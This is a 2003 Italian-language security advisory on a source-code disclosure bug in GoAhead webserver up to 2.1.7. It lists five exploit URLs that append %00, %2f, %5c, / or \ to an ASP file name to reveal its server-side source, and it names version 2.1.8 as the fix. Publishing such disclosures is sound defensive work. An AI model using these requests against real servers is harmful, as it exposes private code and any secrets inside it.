#######################################################################

                             Luigi Auriemma

Applicazione: Goahead webserver
              http://www.goahead.com/webserver/webserver.htm
Versioni:     <= 2.1.7
Piattaforme:  multipiattaforma
Bug:          visione del codice sorgente dei server side scripts usati
              dal server
Exploitation: semplice via browser
Data:         17 Dec 2003
Autore:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

NOTA (23 Dec 2003): alcuni giorni dopo il rilascio dell'advisory ho
     visto che lo stesso bug fu' riportato nell'Agosto 2002 da
     Richard Brain (richard.brain@procheckup.com) ad alcune
     mailing-lists ma non a Bugtraq dove infatti non c'era alcun BID o
     mail riguardo tale vulnerabilita', percio' non l'ho visto... sorry
     La cosa brutta e' che Goahead non ha visto (o non ha corretto)
     tale bug per oltre un anno. 8-(


#######################################################################


1) Introduzione
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduzione
===============


Goahead webserver e' un server OpenSource embedded che puo' essere
compilato su svariati sistemi (CE, Ecos, GNU/Linux, Lynx, MacOS, NW,
QNX4, VXWORKS, Win32 ed altri).
Esso e' supportato da molte compagnie che lo usano per i loro progetti
ed e' anche usato come "base" per altri webservers, inoltre e' stato
sviluppato con lo scopo di occupare poche risorse e di girare su
sistemi embedded.


#######################################################################

======
2) Bug
======


Goahead webserver supporta l'uso dei file ASP che sono "eseguiti" dal
server quando sono chiamati dal browser del client.
Esiste una vulnerabilita' che permette ai clients di vedere il codice
sorgente di ogni file ASP (o di altri server side scripts eccetto i
cgi-bin) semplicemente aggiungendo alcuni caratteri o caratteri URL
encoded alla file del nome del file richiesto:

%00, %2f, %5c, / e \


#######################################################################

===========
3) The Code
===========


http://server/asp.asp%00
http://server/asp.asp%2f
http://server/asp.asp%5c
http://server/asp.asp/
http://server/asp.asp\


#######################################################################

======
4) Fix
======


Versione 2.1.8 del 8 Dec 2003


#######################################################################